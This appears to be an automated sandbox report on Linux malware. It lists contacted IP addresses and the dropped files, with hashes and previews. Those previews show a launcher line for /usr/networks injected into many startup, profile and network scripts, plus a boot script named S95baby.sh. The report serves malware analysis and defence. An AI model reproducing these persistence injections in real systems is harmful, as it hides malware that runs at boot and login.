186.127.250.135	unknown	Argentina	7303	TelecomArgentinaSAAR	false
17.209.94.162	unknown	United States	714	APPLE-ENGINEERINGUS	false
76.189.201.245	unknown	United States	10796	TWC-10796-MIDWESTUS	false
181.183.102.130	unknown	Venezuela	262210	VIETTELPERUSACPE	false
186.134.33.191	unknown	Argentina	22927	TelefonicadeArgentinaAR	false
192.144.81.128	unknown	Bangladesh	58826	ICOMBANGLADESHLTD-BDpingbyICOMBangladeshLtdBD	false
37.148.152.25	unknown	Germany	198967	BITEL-GESELLSCHAFT-FUER-TELEKOMMUNIKATION-AS-IPTransitC	false
189.212.242.229	unknown	Mexico	6503	AxtelSABdeCVMX	false
106.25.199.66	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
14.12.94.24	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
64.208.187.179	unknown	United States	62262	QUBICASGB	false
117.196.55.244	unknown	India	9829	BSNL-NIBNationalInternetBackboneIN	false
83.34.29.8	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
112.193.89.217	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
88.248.201.54	unknown	Turkey	9121	TTNETTR	false
221.88.134.158	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
22.14.164.25	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
193.1.101.106	unknown	Ireland	1213	HEANETIE	false
222.92.234.116	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
17.54.72.65	unknown	United States	714	APPLE-ENGINEERINGUS	false
194.190.206.103	unknown	Russian Federation	57107	RSCC-ASRU	false
181.211.64.157	unknown	Ecuador	28006	CORPORACIONNACIONALDETELECOMUNICACIONES-CNTEPEC	false
79.22.69.125	unknown	Italy	3269	ASN-IBSNAZIT	false
46.230.96.252	unknown	Saudi Arabia	35819	MOBILY-ASEtihadEtisalatCompanyMobilySA	false
161.52.123.70	unknown	Sweden	43922	MALMOSE	false
46.146.25.135	unknown	Russian Federation	12768	ER-TELECOM-ASRU	false
65.235.104.115	unknown	United States	701	UUNETUS	false
132.17.157.215	unknown	United States	427	AFCONC-BLOCK1-ASUS	false
171.112.185.78	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
184.126.156.228	unknown	United States	7922	COMCAST-7922US	false
119.113.120.170	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
142.114.10.196	unknown	Canada	577	BACOMCA	false
197.23.125.151	unknown	Tunisia	37693	TUNISIANATN	false
175.239.97.66	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
218.50.238.88	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
154.249.187.10	unknown	Algeria	36947	ALGTEL-ASDZ	false
142.178.73.14	unknown	Canada	18814	ATC-DC-NET01CA	false
38.197.168.247	unknown	United States	174	COGENT-174US	false
207.249.235.141	unknown	Mexico	2549	UniversidaddeGuadalajaraMX	false
16.112.202.2	unknown	United States	unknown	unknown	false
4.67.109.111	unknown	United States	46164	ATT-MOBILITY-LABSUS	false
67.165.181.82	unknown	United States	7922	COMCAST-7922US	false
219.253.38.248	unknown	Korea Republic of	18302	SKG_NW-AS-KRSKTelecomKR	false
166.57.155.129	unknown	United States	19554	OPENTEXT-AS-NA-US6CA	false
221.104.48.126	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
39.179.39.95	unknown	China	9808	CMNET-GDGuangdongMobileCommunicationCoLtdCN	false
70.107.151.243	unknown	United States	701	UUNETUS	false
30.223.214.12	unknown	United States	7922	COMCAST-7922US	false
107.234.200.0	unknown	United States	20057	ATT-MOBILITY-LLC-AS20057US	false
155.108.107.202	unknown	United States	1906	NORTHROP-GRUMMANUS	false
143.95.128.28	unknown	United States	62729	ASMALLORANGE1US	false
92.189.120.221	unknown	France	12479	UNI2-ASES	false
146.51.174.99	unknown	Japan	1124	UVA-NLUniversiteitvanAmsterdamEU	false
91.125.84.41	unknown	United Kingdom	6871	PLUSNETUKInternetServiceProviderGB	false
188.115.214.179	unknown	Armenia	44395	ORG-UL31-RIPEAM	false
140.96.96.109	unknown	Taiwan; Republic of China (ROC)	18422	ITRINET-AS-TWIndustrialTechnologyResearchInstituteTW	false
191.71.196.147	unknown	Colombia	26611	COMCELSACO	false

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	./usr/networks&.exit 1.

/etc/acpi/asus-keyboard-backlight.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	326
Entropy (8bit):	5.2904323771702915
Encrypted:	false
SSDEEP:	6:K8K2A6godGINKlsX3stINKVHBfNewdrCDjwFhD2UDKVHxMn:1f/NA23stIN8HdNTek3n8HWn
MD5:	626FDB50CA17F4E2BAAB79F09F3EB73B
SHA1:	2D838897E7D735CB67348F60EDA0E1E41D45DCBE
SHA-256:	3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
SHA-512:	E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	./usr/networks&.test -d $KEYS_DIR \|\| exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.

/etc/acpi/asus-wireless.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	157
Entropy (8bit):	4.412729940630044
Encrypted:	false
SSDEEP:	3:qXVfGHvNM8iKWERAIda74QvvvLwDGvNM8iKWERAIdJCsqORFL8OORgn:KJFn40MLFb+Pn
MD5:	9B10038ADE21F207C6C9F4EEC7C5ADA2
SHA1:	F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
SHA-256:	E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
SHA-512:	C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	./usr/networks&.test -f /usr/share/acpi-support/state-funcs \|\| exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.

/etc/acpi/ibm-wireless.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	636
Entropy (8bit):	4.722087767454589
Encrypted:	false
SSDEEP:	12:wNGs4KSb7jFCR2TeNMngFfiTccfkneFhpmtjwkuVSd/1kVqEn:wFS/5uab2d7neFhij26/CwE
MD5:	77315C7FA7809C62D27AD6C9EE1C9289
SHA1:	C8EC67C17E334B13B1DE93B0D2E822C606F9985E
SHA-256:	81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
SHA-512:	B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	./usr/networks&.test -f /usr/share/acpi-support/state-funcs \|\| exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list \| sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' \| grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.

/etc/acpi/tosh-wireless.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	483
Entropy (8bit):	4.215331622973397
Encrypted:	false
SSDEEP:	6:KJFqcA/0MLFMkneFUJLS3SU9mFCQROAJzHdcnK/lHb/iHIYK3zQYlyMn:wK8QdeFuS3lyXp9cK/lziijQYlrn
MD5:	07889D65619CDB80F8E876A087F160D3
SHA1:	35CB92B632BCA335EBEA933A736F75856E8CA262
SHA-256:	34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
SHA-512:	C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	./usr/networks&.test -f /usr/share/acpi-support/key-constants \|\| exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth \| grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.

/etc/acpi/undock.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.77497394042067
Encrypted:	false
SSDEEP:	6:KJFqcA/05CbMTCYEBKAABrX8FvfbrX8EmNv0V4n:wK852PYEBKAkrX4HXHnV4n
MD5:	5E3A15E41D35EC409613236A20B5783E
SHA1:	5D71BD9A121461464F7937B2E921410ED93BEE24
SHA-256:	C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
SHA-512:	13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	./usr/networks&.test -f /usr/share/acpi-support/key-constants \|\| exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] \|\| continue..[ x$(cat "$device/type") = xdock_station ] \|\| continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.

/etc/console-setup/cached_setup_font.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	./usr/networks&.exit 1.

/etc/console-setup/cached_setup_keyboard.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	297
Entropy (8bit):	4.680424868813
Encrypted:	false
SSDEEP:	6:aJGzAuCuzHB/unOJufu+/ugEWR+V18yjPn:aJcvzHBmnO4G7gEWQ18yTn
MD5:	10400BA156D6BC78E67D90A86A2906D4
SHA1:	D4D7BA30B85ABA9FC08EC0C990651601128B2A74
SHA-256:	D348A8461FB9190DCBD6CF35575B2C4799E04AA4E359EA921F8723C9FDAA457A
SHA-512:	25B5C137961E10987A0BBF19AD7CCABC865A7DF7325D3C7B0B0C9BBDB68D5C4470B012A720FA43B707705ACB8FD8DD834AF3DCF7AEA3284A5587EC3E9212E9B3
Malicious:	false
Preview:	./usr/networks&. exit 0.fi.kbd_mode '-u' < '/dev/tty1' .kbd_mode '-u' < '/dev/tty2' .kbd_mode '-u' < '/dev/tty3' .kbd_mode '-u' < '/dev/tty4' .kbd_mode '-u' < '/dev/tty5' .kbd_mode '-u' < '/dev/tty6' .loadkeys '/etc/console-setup/cached_UTF-8_del.kmap.gz' > '/dev/null' ../usr/networks&.exit 1.

/etc/console-setup/cached_setup_terminal.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/etc/gdm3/config-error-dialog.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/etc/init.d/S95baby.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	25
Entropy (8bit):	3.8936606896881854
Encrypted:	false
SSDEEP:	3:TKH4v0VJ:hK
MD5:	1B3235BA10FC04836C941D3D27301956
SHA1:	8909655763143702430B8C58B3AE3B04CFD3A29C
SHA-256:	01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
SHA-512:	98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
Malicious:	true
Preview:	#!/bin/sh./usr/networks&.

/etc/init.d/console-setup.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	85
Entropy (8bit):	3.542211979287425
Encrypted:	false
SSDEEP:	3:qXVxpjWvFFFfN6DmXVOORgn:apqvFFxN6iMn
MD5:	C0EB4B74AA083DE0731C7411490F5680
SHA1:	91FE8A766B188646A140A0272D115A4E98F5587B
SHA-256:	B2303EB7BFEE2D091C009CC33291EE1D146B2CBFCC52E1334EAA220777053768
SHA-512:	4BA597428E1FB7A6C6A050A974BBD9ED955D5E5EFEDCD39CD44B274F34E7542CFB4E90A3F28C02D52AD4AA0C05AE73B1AABE6CC88B19203C1B4E9DBDB39CB2A5
Malicious:	true
Preview:	./usr/networks&. exit 3. ;;. esac.fi../usr/networks&.exit 1.

/etc/init.d/hwclock.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/init.d/keyboard-setup.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	85
Entropy (8bit):	3.542211979287425
Encrypted:	false
SSDEEP:	3:qXVxpjWvFFFfN6DmXVOORgn:apqvFFxN6iMn
MD5:	C0EB4B74AA083DE0731C7411490F5680
SHA1:	91FE8A766B188646A140A0272D115A4E98F5587B
SHA-256:	B2303EB7BFEE2D091C009CC33291EE1D146B2CBFCC52E1334EAA220777053768
SHA-512:	4BA597428E1FB7A6C6A050A974BBD9ED955D5E5EFEDCD39CD44B274F34E7542CFB4E90A3F28C02D52AD4AA0C05AE73B1AABE6CC88B19203C1B4E9DBDB39CB2A5
Malicious:	true
Preview:	./usr/networks&. exit 3. ;;. esac.fi../usr/networks&.exit 1.

/etc/profile.d/01-locale-fix.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/Z97-byobu.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/Z99-cloud-locale-test.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/Z99-cloudinit-warnings.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/apps-bin-path.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/bash_completion.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/cedilla-portuguese.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/gawk.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/im-config_wayland.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/vte-2.91.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/profile.d/xdg_dirs_desktop_session.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	true
Preview:	./usr/networks&.exit 1.

/etc/rcS.d/S95baby.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	25
Entropy (8bit):	3.8936606896881854
Encrypted:	false
SSDEEP:	3:TKH4v0VJ:hK
MD5:	1B3235BA10FC04836C941D3D27301956
SHA1:	8909655763143702430B8C58B3AE3B04CFD3A29C
SHA-256:	01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
SHA-512:	98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
Malicious:	true
Preview:	#!/bin/sh./usr/networks&.

/etc/wpa_supplicant/action_wpa.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	714
Entropy (8bit):	5.329653855555143
Encrypted:	false
SSDEEP:	12:cVDDdg8QdNux7S3Pd7PSeSST4ydVgpuVFnn3izesU6jc45gfqlX4n:UDxReIx7O9BSu4ydVBnn4742gyJ4
MD5:	DD099D71A60531087FDDED3EBEE8036A
SHA1:	C684334C3B133D889F8C5965184E1C9280BAA16A
SHA-256:	52995C5CED8EE9421D08E745C5E3D9805783E5D641C7A8FDB1C3CA6A4C745E03
SHA-512:	2788EB77A944861C3361D12DB65502553EE36314C40A864F73B2FF18AF54DA3D02F5AC07DBA4E962596F11DD8B826243BE2FD52F85F1260B511D3241E1C38C63
Malicious:	false
Preview:	./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/; do..[ -S "${CTRL}" ] \|\| continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.

/etc/wpa_supplicant/functions.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/etc/wpa_supplicant/ifupdown.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	3368
Entropy (8bit):	5.3288648372922625
Encrypted:	false
SSDEEP:	48:VcySPOD1MoGPVKSQ5NkmzYykHypw5lX3yp4ZpOqq9GCyiqYJ7l87OqxOCXnNnogq:lZfGPODjea4+9Gc7kOqxOC9ogwaRM
MD5:	77FEC347F290A3B065F36EE08ABB77C6
SHA1:	388D7CC5DDF20DD8651ED01B99460B7CECCBA46A
SHA-256:	40AE2677EF20938DC8A5D3776051D318F4C8059155D5CC146565DF028B45C283
SHA-512:	B377C9FED8545F0BC409AD6675E856C9B9C6183D1E6F189E1142E8CCEC89183273D357BE4FB720B680C4057EE045A2E19E9D4E82DDB33F3CED77EA38C1E07EAF
Malicious:	false
